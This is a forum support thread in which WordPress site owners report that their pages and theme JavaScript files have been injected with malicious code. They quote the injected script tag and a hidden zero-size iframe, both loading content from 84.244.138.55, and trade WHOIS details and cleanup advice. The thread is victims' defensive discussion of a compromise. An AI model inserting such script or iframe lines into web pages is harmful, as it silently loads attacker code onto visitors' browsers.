Thread Starter
cwary
(@cwary)
I’ve just figured out that code there is on all of my pages and the ascii numbers point to this
<script type=”text/javascript” src=’http://84.244.138.55/stats/stat.js”></script>
I just put up my site, but it looks like its already been hacked somehow? I don’t see of any plugins this could be connected to. Any tips on how to get rid of this code without having to reinstall all of wordpress?
I just ran into this code on my site as well. The code was inserted into a menu.js file inside my wordpress theme. I have no idea how it got there!
Have you installed any new plugins recently?
Thread Starter
cwary
(@cwary)
I Ended up reinstalling wordpress and that worked…for a little. It mysteriously showed up again today, and I can’t figure our why or how.
Here’s the plugins I’m running:
FeedSmith
Global Translator
Google XML Sitemaps
Headspace 2
Privacy Policy
Robots Meta
SEO Friendly Images
SEO Slugs
Weather Widget.
I’m also using the amazing grace template.
Thread Starter
cwary
(@cwary)
Looking up the domain http://84.244.138.55 in WhoIs I got this information:
‘
inetnum: 84.244.138.0 – 84.244.138.127
netname: Serverboost-2
descr: IP Space provided by We Dare
country: NL
admin-c: Sr4706-RIPE
tech-c: Sr4706-RIPE
status: ASSIGNED PA
mnt-by: WEDARE-MNT
source: RIPE # Filtered
role: Serverboost role
address: Vlaardingerdijk 430
address: 3117 ZW Schiedam
address: The Netherlands
phone: +31 (0)6 1482 4915
abuse-mailbox:
admin-c: JM6599-RIPE
tech-c: JM6599-RIPE
nic-hdl: Sr4706-RIPE
mnt-by: MNT-I3D
source: RIPE # Filtered
route: 84.244.128.0/18
descr: Route to first IP-numberblock We Dare BV
origin: AS20495
mnt-by: WEDARE-MNT
source: RIPE # Filtered
route: 84.244.128.0/19
descr: We Dare B.V.
origin: AS20495
mnt-by: WEDARE-MNT
source: RIPE # Filtered’
The resolve host is web.xxxgallz.com.
I’m really at a loss for what’s going on here, google analytics has me getting a visit from the Netherlands today, so that could be it, but I don’t know why this would have happened twice to my blog when I’ve just posted and have a hot 10 people coming to it per day.
This is a VIRUS. Your site has been hacked. Delete this immediately.
Basically, if you decode the numbers, it goes to another site and executes a downloaded script in an iframe so it’s not visible.
Within a few days, google will notice your site as having malware and will block searches.
Does anyone have any idea on how this is installed? I’ve heard of it going into both wordpress and joomla.
This malware also seems to be affecting my site – http://www.dpadmagazine.com – but having looked through all of the files and pages, I can’t find any inserted code.
A gap has also appeared at the top of the page when viewed in Firefox 3 on Windows and some Footer code has disappeared. I’m presuming it’s a hack, but having not been able to find this code I’ve no idea on how to fix it.
Anyone able to help?
When you’ve been looking at the code have you been looking at the source online or in your local files?
We’ve had problems a few times with code from xxxgallz being put into our site (most recent was this morning), the code usually gets put in the bottom of out javascript files though the most recent was put in at the bottom of the actual homepage with script tags.
Does anyone know how they could keep getting in? Our hosts tell us there’s no security problems with their servers and it could be something we have installed and could be because of our wordpress, maybe we don’t have permissions set correctly and these people are exploiting that?
It always seems to be some kind of tracking or analytics script, but I don’t know what benefit a dutch porn site would get from having information about our visitors?
We checked the online files. We still couldn’t find the code but someone looking into it spotted the following invisible iframe. I’ve removed the http below just in case but it was 84.244.138.55.
<iframe height=”0%” frameborder=”0″ width=”0%” scrolling=”auto” noresize=”” marginwidth=”0″ marginheight=”0″ src=”http:/ts/in.cgi?sltest”/>
We did however find a random cache.php file on the server which we deleted, which also removed the random gap at the top of the page. After resubmitting the site for review, it passed, only to then fail almost immediately. The cache.php hasn’t reappeared, and we’re completely stumped as to how to progress…
Hi,
This is a prevalent hack for the last couple of weeks. I’ve just blogged about it. (I’m posting the link in hope it will help resolve the issue)
http://blog.unmaskparasites.com/2009/04/02/malicious-stats-from-84-244-138-0/
I have a strong feeling this hack has to do with compromised passwords.
Scan your computer for spyware and then change all site passwords.
